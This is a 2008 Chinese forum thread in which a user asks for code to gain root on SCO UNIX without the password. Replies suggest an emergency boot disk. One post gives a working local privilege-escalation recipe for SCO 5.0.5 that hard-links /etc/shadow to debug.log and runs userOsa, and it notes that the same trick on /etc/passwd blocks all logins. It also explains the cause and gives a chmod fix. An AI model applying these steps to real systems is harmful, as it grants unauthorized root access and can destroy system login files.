免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2132 | 回复: 4
打印 上一主题 下一主题

[SCO UNIX] 谁有SCO 5.0.4普通用户变为root用户的shell或C代码 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-10-19 10:08 |只看该作者 |倒序浏览
有位朋友忘记了root密码,只知道普通用户密码,我记得以前可以利用系统bug执行一段程序或shell,变为root用户,但现在一时找不到这样的shell了,请问谁有麻烦提供一份,谢谢。

论坛徽章:
0
2 [报告]
发表于 2008-10-20 09:05 |只看该作者
最简单的还是利用应急盘恢复

论坛徽章:
0
3 [报告]
发表于 2008-10-22 17:09 |只看该作者
这个好像没有听说过。不过用应急盘肯定可行。

论坛徽章:
1
15-16赛季CBA联赛之北控
日期:2022-03-04 22:35:50
4 [报告]
发表于 2008-10-23 08:22 |只看该作者
SCO5.0.5 Unix 有一个大BUG——任何普通用户都可以成为超级用户.

步骤:

    1. 用普通用户登录到系统,然后进入一个有写权限的目录
    2. ln /etc/shadow debug.log        (硬连接)
    3. 执行/etc/sysadm.d/bin/userOsa   (O是大写的字母o)
   
    操作完成之后,/etc/shadow文件被覆盖, 此时可以使用系统中的
    任何用户登陆系统,不用密码,包括root用户.
   
    注: 如果2中改为ln /etc/passwd debug.log
        则/etc/passwd被覆盖,谁也登录不了系统.
   

原因:
        SCO5.0.5 Unix中/etc/sysadm.d/bin/userOsa程序在
        运行时会生成一个名叫debug.log的文件,这个文件用户属于
        root 组,而且此程序有BUG,不会检查用户权限,因此可以
        覆盖任何文件,包括passwd和shadow.

清除此漏洞:
        用root用户登录,到/etc/sysadm.d/bin下执,行
        chmod o-x userOsa即可



此漏洞只在SCO5.0.5 unix存在, SCO5.0.6 unix或更高版本不存在.

论坛徽章:
0
5 [报告]
发表于 2008-10-25 18:48 |只看该作者
学习了。
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP